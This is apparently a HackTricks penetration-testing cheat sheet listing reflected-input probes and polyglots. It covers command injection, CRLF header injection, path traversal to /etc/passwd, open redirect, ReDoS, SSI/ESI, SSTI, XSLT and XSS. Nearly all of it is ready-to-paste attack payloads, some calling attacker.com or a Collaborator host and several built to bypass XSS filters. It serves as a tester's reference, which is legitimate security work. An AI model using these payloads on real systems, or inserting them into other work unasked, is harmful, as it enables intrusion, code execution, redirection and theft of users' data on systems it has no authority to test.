HackTricks
Reflecting Techniques - PoCs and Polyglots CheatSheet
The goal of these PoCs and polyglots is to give the tester a fast summary of the vulnerabilities they may be able to exploit if their input is somehow reflected in the response.
This cheatsheet doesn't propose a comprehensive list of tests for each vulnerability, just some basic ones. If you are looking for more comprehensive tests, see the page dedicated to each vulnerability listed here.
You won't find Content-Type dependent injections like XXE, as usually you will try those yourself if you find a request sending XML data. Nor will you find database injections here: even if some content is reflected, they depend heavily on the backend DB technology and structure.

Polyglots list

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Client Side Template Injection

Basic Tests

{{7*7}}
[7*7]

Polyglots

{{7*7}}[7*7]

Command Injection

Basic Tests

;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

Polyglots

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

CRLF

Basic Tests

%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

Dangling Markup

Basic Tests

<br><b><h1>THIS IS AND INJECTED TITLE </h1>

File Inclusion/Path Traversal

Basic Tests

/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php

Open Redirect

Basic Tests

www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)

ReDoS

Basic Tests

(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$

Server Side Inclusion/Edge Side Inclusion

Basic Tests

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Polyglots

<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Server Side Request Forgery

The same tests used for Open Redirect can be used here.

Server Side Template Injection

Basic Tests

${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Polyglots

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\

XSLT Injection

Basic Tests

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

Polyglots

<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

XSS

Basic Tests

" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()

Polyglots

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>